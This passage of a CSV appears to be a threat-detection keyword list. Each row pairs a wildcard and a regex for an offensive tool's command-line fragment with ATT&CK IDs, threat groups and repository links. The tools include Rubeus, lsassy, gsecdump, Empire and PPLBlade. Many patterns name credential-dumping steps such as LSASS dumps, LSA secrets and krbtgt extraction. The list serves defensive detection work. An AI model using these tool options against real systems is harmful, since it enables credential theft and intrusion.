"* dpapi_domain_backupkey.py*",".{0,1000}\sdpapi_domain_backupkey\.py.{0,1000}","offensive_tool_keyword","nemesis","An offensive data enrichment pipeline","T1592 - T1583 - T1595 - T1590","TA0042 - TA0043","N/A","Black Basta","Resource Development","https://github.com/SpecterOps/Nemesis","1","0","N/A","N/A","9","7","672","65","2025-04-17T21:55:10Z","2023-07-13T18:24:24Z","957"
"* dpapi_masterkey.py*",".{0,1000}\sdpapi_masterkey\.py.{0,1000}","offensive_tool_keyword","nemesis","An offensive data enrichment pipeline","T1592 - T1583 - T1595 - T1590","TA0042 - TA0043","N/A","Black Basta","Resource Development","https://github.com/SpecterOps/Nemesis","1","0","N/A","N/A","9","7","672","65","2025-04-17T21:55:10Z","2023-07-13T18:24:24Z","958"
"* DPAPImk2john.py*",".{0,1000}\sDPAPImk2john\.py.{0,1000}","offensive_tool_keyword","nemesis","An offensive data enrichment pipeline","T1592 - T1583 - T1595 - T1590","TA0042 - TA0043","N/A","Black Basta","Resource Development","https://github.com/SpecterOps/Nemesis","1","0","N/A","N/A","9","7","672","65","2025-04-17T21:55:10Z","2023-07-13T18:24:24Z","959"
"* dpipe.sh*",".{0,1000}\sdpipe\.sh.{0,1000}","offensive_tool_keyword","POC","POC exploitation for dirty pipe vulnerability","t1543","TA0003","N/A","N/A","Exploitation tool","https://github.com/basharkey/CVE-2022-0847-dirty-pipe-checker","1","0","N/A","N/A","N/A","1","67","29","2023-06-14T23:25:46Z","2022-03-08T17:13:24Z","960"
"* dragoncastle.py*",".{0,1000}\sdragoncastle\.py.{0,1000}","offensive_tool_keyword","DragonCastle","A PoC that combines AutodialDLL Lateral Movement technique and SSP to scrape NTLM hashes from LSASS process.","T1003 - T1547.005 - T1055 - T1557","TA0008 - TA0006","N/A","N/A","Credential Access","https://github.com/mdsecactivebreach/DragonCastle","1","0","N/A","N/A","10","3","298","38","2022-10-26T10:19:55Z","2022-10-26T10:18:37Z","961"
"* DraytekScan*",".{0,1000}\sDraytekScan.{0,1000}","offensive_tool_keyword","cobaltstrike","Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. loaded in memory and has no file scanning","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","Ghost Ransomware","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/k8gege/Ladon","1","0","N/A","N/A","10","10","5025","880","2025-03-24T13:53:59Z","2019-11-02T06:22:41Z","962"
"* drda-brute.nse*",".{0,1000}\sdrda\-brute\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","963"
"* drda-info.nse*",".{0,1000}\sdrda\-info\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","964"
"* DriverName *Xeroxxx*",".{0,1000}\sDriverName\s.{0,1000}Xeroxxx.{0,1000}","offensive_tool_keyword","conti","Conti is a Ransomware-as-a-Service (RaaS) that was first observed in December 2019. Conti has been deployed via TrickBot and used against major corporations and government agencies particularly those in North America. As with other ransomware families - actors using Conti steal sensitive files and information from compromised networks and threaten to publish this data unless the ransom is paid","T1059.003 - T1486 - T1140 - T1083 - T1490 - T1106 - T1135 - T1027 - T1057 - T1055.001 - T1021.002 - T1018 - T1489 - T1016 - T1049 - T1080","TA0002 - TA0003 - TA0004 - TA0007 - TA0009 - TA0040","Conti Ransomware","Wizard Spider - Black Basta","Ransomware","https://www.securonix.com/blog/on-conti-ransomware-tradecraft-detection/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","965"
"* --drop-drag-and-drop-target*",".{0,1000}\s\-\-drop\-drag\-and\-drop\-target.{0,1000}","offensive_tool_keyword","blackcat ransomware","BlackCat Ransomware behavior","T1486.001 - T1489 - T1490 - T1486","TA0011 - TA0010 - TA0012 - TA0007 - TA0040","N/A","N/A","Ransomware","https://www.sentinelone.com/labs/blackcat-ransomware-highly-configurable-rust-driven-raas-on-the-prowl-for-victims/","1","0","N/A","FIN7","10","10","N/A","N/A","N/A","N/A","966"
"* DSInternals.psd1*",".{0,1000}\sDSInternals\.psd1.{0,1000}","offensive_tool_keyword","DSInternals","Directory Services Internals (DSInternals) PowerShell Module and Framework - abused by attackers","T1003 - T1087 - T1018 - T1110 - T1558","TA0003 - TA0006 - TA0007","N/A","COZY BEAR","Discovery","https://github.com/MichaelGrafnetter/DSInternals","1","0","N/A","AD Enumeration","10","10","1760","265","2025-04-16T18:12:55Z","2015-12-25T13:23:05Z","968"
"* dump * /service:*",".{0,1000}\sdump\s.{0,1000}\s\/service\:.{0,1000}","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1482 - T1558.001 - T1558.002 - T1558.003 - T1558.004","TA0006","N/A","Black Basta - Dispossessor - Conti - Diavol - Ryuk - Wizard Spider - APT29 - COZY BEAR","Credential Access","https://github.com/GhostPack/Rubeus","1","0","N/A","N/A","10","10","4409","804","2025-04-17T10:11:57Z","2018-09-23T23:59:03Z","969"
"* dump --bucket *--dump-dir*",".{0,1000}\sdump\s\-\-bucket\s.{0,1000}\-\-dump\-dir.{0,1000}","offensive_tool_keyword","S3Scanner","Scan for open S3 buckets and dump the contents","T1583 - T1583.002 - T1114 - T1114.002","TA0010","N/A","N/A","Reconnaissance","https://github.com/sa7mon/S3Scanner","1","0","N/A","N/A","8","10","2743","384","2025-04-21T14:44:23Z","2017-06-19T22:14:21Z","970"
"* dump --usermode --kernelmode --driver *",".{0,1000}\sdump\s\-\-usermode\s\-\-kernelmode\s\-\-driver\s.{0,1000}","offensive_tool_keyword","lsassy","Extract credentials from lsass remotely","T1003.001 - T1021.001 - T1021.002 - T1555.003","TA0006","N/A","N/A","Credential Access","https://github.com/login-securite/lsassy","1","0","N/A","N/A","10","10","2105","251","2024-12-31T11:56:19Z","2019-12-03T14:03:41Z","971"
"* dump.ps1*",".{0,1000}\sdump\.ps1.{0,1000}","offensive_tool_keyword","merlin","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin","1","0","N/A","N/A","10","10","5221","826","2025-04-17T15:08:42Z","2017-01-06T11:18:20Z","972"
"* --dump_file Keepass.exe.dmp*",".{0,1000}\s\-\-dump_file\sKeepass\.exe\.dmp.{0,1000}","offensive_tool_keyword","KeePwn","A python tool to automate KeePass discovery and secret extraction","T1555 - T1003 - T1114","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/Orange-Cyberdefense/KeePwn","1","0","N/A","N/A","10","5","486","47","2024-12-12T12:47:07Z","2023-01-27T13:59:38Z","973"
"* --dump_lsa*",".{0,1000}\s\-\-dump_lsa.{0,1000}","offensive_tool_keyword","gsecdump","credential dumper used to obtain password hashes and LSA secrets from Windows operating systems","T1003.001 - T1003.002 - T1555.003 - T1555.001","TA0006 - TA0008","N/A","APT1 - PittyTiger - Tonto Team - BRONZE BUTLER - Threat Group-3390 - APT22 - APT24 - APT27 - Night Dragon - Tick","Credential Access","https://web.archive.org/web/20150606043951if_/http://www.truesec.se/Upload/Sakerhet/Tools/gsecdump-v2b5.exe","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A","974"
"* dump_memory64*",".{0,1000}\sdump_memory64.{0,1000}","offensive_tool_keyword","cobaltstrike","Collection of beacon object files for use with Cobalt Strike to facilitate","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/rookuu/BOFs","1","0","N/A","N/A","10","10","175","26","2021-02-11T10:48:12Z","2021-02-11T10:28:48Z","975"
"* --dump_usedhashes*",".{0,1000}\s\-\-dump_usedhashes.{0,1000}","offensive_tool_keyword","gsecdump","credential dumper used to obtain password hashes and LSA secrets from Windows operating systems","T1003.001 - T1003.002 - T1555.003 - T1555.001","TA0006 - TA0008","N/A","APT1 - PittyTiger - Tonto Team - BRONZE BUTLER - Threat Group-3390 - APT22 - APT24 - APT27 - Night Dragon - Tick","Credential Access","https://web.archive.org/web/20150606043951if_/http://www.truesec.se/Upload/Sakerhet/Tools/gsecdump-v2b5.exe","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A","976"
"* --dump_wireless*",".{0,1000}\s\-\-dump_wireless.{0,1000}","offensive_tool_keyword","gsecdump","credential dumper used to obtain password hashes and LSA secrets from Windows operating systems","T1003.001 - T1003.002 - T1555.003 - T1555.001","TA0006 - TA0008","N/A","APT1 - PittyTiger - Tonto Team - BRONZE BUTLER - Threat Group-3390 - APT22 - APT24 - APT27 - Night Dragon - Tick","Credential Access","https://web.archive.org/web/20150606043951if_/http://www.truesec.se/Upload/Sakerhet/Tools/gsecdump-v2b5.exe","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A","977"
"* --dump-adcs*",".{0,1000}\s\-\-dump\-adcs.{0,1000}","offensive_tool_keyword","krbrelayx","Kerberos unconstrained delegation abuse toolkit","T1558.003 - T1098","TA0004 - TA0006","N/A","N/A","Exploitation tool","https://github.com/dirkjanm/krbrelayx","1","0","N/A","N/A","N/A","10","1281","181","2025-01-27T09:22:54Z","2019-01-08T18:42:07Z","978"
"* --dump-bitlocker *",".{0,1000}\s\-\-dump\-bitlocker\s.{0,1000}","offensive_tool_keyword","quarkspwdump","Quarks PwDump is a native Win32 tool to extract credentials from Windows operating systems","T1003 - T1003.001 - T1059","TA0006","N/A","LOTUS PANDA - PowerPool - Calypso","Credential Access","https://github.com/peterdocter/quarkspwdump","1","0","N/A","N/A","9","1","12","8","2015-06-25T04:22:21Z","2015-07-14T08:18:08Z","979"
"* --dump-bitlocker*",".{0,1000}\s\-\-dump\-bitlocker.{0,1000}","offensive_tool_keyword","quarkspwdump","Dump various types of Windows credentials without injecting in any process","T1003 - T1555","TA0006","N/A","N/A","Credential Access","https://github.com/quarkslab/quarkspwdump","1","0","N/A","N/A","10","5","427","142","2023-01-13T03:45:25Z","2013-02-13T15:16:30Z","980"
"* -DumpCerts *",".{0,1000}\s\-DumpCerts\s.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER","Framework","https://github.com/EmpireProject/Empire","1","0","N/A","N/A","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","981"
"* -DumpCred -ComputerName @*",".{0,1000}\s\-DumpCred\s\-ComputerName\s\@.{0,1000}","offensive_tool_keyword","mimidogz","Rewrite of Invoke-Mimikatz.ps1 to avoid AV detection","T1055 - T1560.001 - T1110.001 - T1003 - T1071","TA0005 - TA0040 - TA0006","N/A","Dispossessor","Credential Access","https://github.com/projectb-temp/mimidogz","1","0","N/A","N/A","10","1","0","0","2019-02-11T10:14:10Z","2019-02-11T10:12:08Z","982"
"* -DumpCreds *",".{0,1000}\s\-DumpCreds\s.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER","Framework","https://github.com/EmpireProject/Empire","1","0","N/A","N/A","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","983"
"* -DumpCreds -ComputerName *",".{0,1000}\s\-DumpCreds\s\-ComputerName\s.{0,1000}","offensive_tool_keyword","FruityC2","ruityC2 is a post-exploitation framework based on the deployment of agents on compromised machines","T1090 - T1572 - T1071.001","TA0010 - TA0011 - TA0008 - TA0005","N/A","MuddyWater","C2","https://github.com/xtr4nge/FruityC2","1","0","N/A","https://documents.trendmicro.com/assets/white_papers/wp_new_muddywater_findings_uncovered.pdf","10","10","208","67","2017-12-04T17:05:23Z","2017-01-11T17:27:45Z","984"
"* -DumpCreds -ComputerName @*",".{0,1000}\s\-DumpCreds\s\-ComputerName\s\@.{0,1000}","offensive_tool_keyword","mimidogz","Rewrite of Invoke-Mimikatz.ps1 to avoid AV detection","T1055 - T1560.001 - T1110.001 - T1003 - T1071","TA0005 - TA0040 - TA0006","N/A","Dispossessor","Credential Access","https://github.com/projectb-temp/mimidogz","1","0","N/A","N/A","10","1","0","0","2019-02-11T10:14:10Z","2019-02-11T10:12:08Z","985"
"* dumpCredStore.ps1*",".{0,1000}\sdumpCredStore\.ps1.{0,1000}","offensive_tool_keyword","merlin","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin","1","0","N/A","N/A","10","10","5221","826","2025-04-17T15:08:42Z","2017-01-06T11:18:20Z","986"
"* dumper.ps1*",".{0,1000}\sdumper\.ps1.{0,1000}","offensive_tool_keyword","Amnesiac","Amnesiac is a post-exploitation framework entirely written in PowerShell and designed to assist with Lateral Movement within Active Directory environments","T1021.002 - T1550.002","TA0008","N/A","Black Basta","Framework","https://github.com/Leo4j/Amnesiac","1","0","N/A","N/A","10","5","415","63","2025-03-18T09:32:04Z","2023-10-31T15:06:25Z","987"
"* dumper.ps1*",".{0,1000}\sdumper\.ps1.{0,1000}","offensive_tool_keyword","PowershellKerberos","Some scripts to abuse kerberos using Powershell","T1558.003 - T1558.004 - T1059.001","TA0006 - TA0002","N/A","N/A","Exploitation tool","https://github.com/MzHmO/PowershellKerberos","1","0","N/A","N/A","9","4","328","44","2023-07-27T09:53:47Z","2023-04-22T19:16:52Z","988"
"* dumpert.py*",".{0,1000}\sdumpert\.py.{0,1000}","offensive_tool_keyword","lsassy","Extract credentials from lsass remotely","T1003.001 - T1021.001 - T1021.002 - T1555.003","TA0006","N/A","N/A","Credential Access","https://github.com/login-securite/lsassy","1","0","N/A","N/A","10","10","2105","251","2024-12-31T11:56:19Z","2019-12-03T14:03:41Z","989"
"* -DumpForest -Users *krbtgt*",".{0,1000}\s\-DumpForest\s\-Users\s.{0,1000}krbtgt.{0,1000}","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER","Framework","https://github.com/BC-SECURITY/Empire","1","0","N/A","N/A","10","10","4527","608","2025-04-07T03:02:25Z","2019-08-01T04:22:31Z","990"
"* --dump-gmsa*",".{0,1000}\s\-\-dump\-gmsa.{0,1000}","offensive_tool_keyword","krbrelayx","Kerberos unconstrained delegation abuse toolkit","T1558.003 - T1098","TA0004 - TA0006","N/A","N/A","Exploitation tool","https://github.com/dirkjanm/krbrelayx","1","0","N/A","N/A","N/A","10","1281","181","2025-01-27T09:22:54Z","2019-01-08T18:42:07Z","991"
"* --dump-hash-domain --with-history*",".{0,1000}\s\-\-dump\-hash\-domain\s\-\-with\-history.{0,1000}","offensive_tool_keyword","quarkspwdump","Dump various types of Windows credentials without injecting in any process","T1003 - T1555","TA0006","N/A","N/A","Credential Access","https://github.com/quarkslab/quarkspwdump","1","0","N/A","N/A","10","5","427","142","2023-01-13T03:45:25Z","2013-02-13T15:16:30Z","992"
"* --dump-hash-domain*",".{0,1000}\s\-\-dump\-hash\-domain.{0,1000}","offensive_tool_keyword","quarkspwdump","Quarks PwDump is a native Win32 tool to extract credentials from Windows operating systems","T1003 - T1003.001 - T1059","TA0006","N/A","LOTUS PANDA - PowerPool - Calypso","Credential Access","https://github.com/peterdocter/quarkspwdump","1","0","N/A","N/A","9","1","12","8","2015-06-25T04:22:21Z","2015-07-14T08:18:08Z","993"
"* --dump-hash-domain-cached*",".{0,1000}\s\-\-dump\-hash\-domain\-cached.{0,1000}","offensive_tool_keyword","quarkspwdump","Quarks PwDump is a native Win32 tool to extract credentials from Windows operating systems","T1003 - T1003.001 - T1059","TA0006","N/A","LOTUS PANDA - PowerPool - Calypso","Credential Access","https://github.com/peterdocter/quarkspwdump","1","0","N/A","N/A","9","1","12","8","2015-06-25T04:22:21Z","2015-07-14T08:18:08Z","994"
"* --dump-hash-domain-cached*",".{0,1000}\s\-\-dump\-hash\-domain\-cached.{0,1000}","offensive_tool_keyword","quarkspwdump","Dump various types of Windows credentials without injecting in any process","T1003 - T1555","TA0006","N/A","N/A","Credential Access","https://github.com/quarkslab/quarkspwdump","1","0","N/A","N/A","10","5","427","142","2023-01-13T03:45:25Z","2013-02-13T15:16:30Z","995"
"* --dump-hash-local*",".{0,1000}\s\-\-dump\-hash\-local.{0,1000}","offensive_tool_keyword","quarkspwdump","Quarks PwDump is a native Win32 tool to extract credentials from Windows operating systems","T1003 - T1003.001 - T1059","TA0006","N/A","LOTUS PANDA - PowerPool - Calypso","Credential Access","https://github.com/peterdocter/quarkspwdump","1","0","N/A","N/A","9","1","12","8","2015-06-25T04:22:21Z","2015-07-14T08:18:08Z","996"
"* --dump-laps*",".{0,1000}\s\-\-dump\-laps.{0,1000}","offensive_tool_keyword","krbrelayx","Kerberos unconstrained delegation abuse toolkit","T1558.003 - T1098","TA0004 - TA0006","N/A","N/A","Exploitation tool","https://github.com/dirkjanm/krbrelayx","1","0","N/A","N/A","N/A","10","1281","181","2025-01-27T09:22:54Z","2019-01-08T18:42:07Z","997"
"* DumpLsass.ps1*",".{0,1000}\sDumpLsass\.ps1.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/r00t-3xp10it/redpill","1","0","N/A","N/A","10","3","218","52","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z","998"
"* dump-lsass.py*",".{0,1000}\sdump\-lsass\.py.{0,1000}","offensive_tool_keyword","impacket","Dump-lsass script using impacket - Automates the manual process of using wmiexec and procdump to dump Lsass and plaintext creds or hashes across a large number of systems.","T1021 - T1047 - T1055.011 - T1003","TA0002 - TA0005 - TA0006","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR  - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Credential Access","https://github.com/kaluche/Dump-Lsass","1","0","N/A","N/A","10","1","1","0","2019-11-14T18:15:26Z","2019-11-20T20:26:27Z","999"
"* --dumpmode network --network raw --ip * --port *",".{0,1000}\s\-\-dumpmode\snetwork\s\-\-network\sraw\s\-\-ip\s.{0,1000}\s\-\-port\s.{0,1000}","offensive_tool_keyword","PPLBlade","Protected Process Dumper Tool that support obfuscating memory dump and transferring it on remote workstations without dropping it onto the disk.","T1003.001 - T1027.004 - T1560.001 - T1039 - T1570","TA0006 - TA0005 - TA0010 - TA0003","N/A","N/A","Credential Access","https://github.com/tastypepperoni/PPLBlade","1","0","N/A","N/A","10","6","545","59","2023-08-30T07:59:51Z","2023-08-29T19:36:04Z","1000"
"* --dumpmode network --network smb *",".{0,1000}\s\-\-dumpmode\snetwork\s\-\-network\ssmb\s.{0,1000}","offensive_tool_keyword","PPLBlade","Protected Process Dumper Tool that support obfuscating memory dump and transferring it on remote workstations without dropping it onto the disk.","T1003.001 - T1027.004 - T1560.001 - T1039 - T1570","TA0006 - TA0005 - TA0010 - TA0003","N/A","N/A","Credential Access","https://github.com/tastypepperoni/PPLBlade","1","0","N/A","N/A","10","6","545","59","2023-08-30T07:59:51Z","2023-08-29T19:36:04Z","1001"
"* --dump-name *lsass*",".{0,1000}\s\-\-dump\-name\s.{0,1000}lsass.{0,1000}","offensive_tool_keyword","lsassy","Extract credentials from lsass remotely","T1003.001 - T1021.001 - T1021.002 - T1555.003","TA0006","N/A","N/A","Credential Access","https://github.com/login-securite/lsassy","1","0","N/A","N/A","10","10","2105","251","2024-12-31T11:56:19Z","2019-12-03T14:03:41Z","1002"
"* --dumpname lsass.dmp*",".{0,1000}\s\-\-dumpname\slsass\.dmp.{0,1000}","offensive_tool_keyword","PPLBlade","Protected Process Dumper Tool that support obfuscating memory dump and transferring it on remote workstations without dropping it onto the disk.","T1003.001 - T1027.004 - T1560.001 - T1039 - T1570","TA0006 - TA0005 - TA0010 - TA0003","N/A","N/A","Credential Access","https://github.com/tastypepperoni/PPLBlade","1","0","N/A","N/A","10","6","545","59","2023-08-30T07:59:51Z","2023-08-29T19:36:04Z","1003"
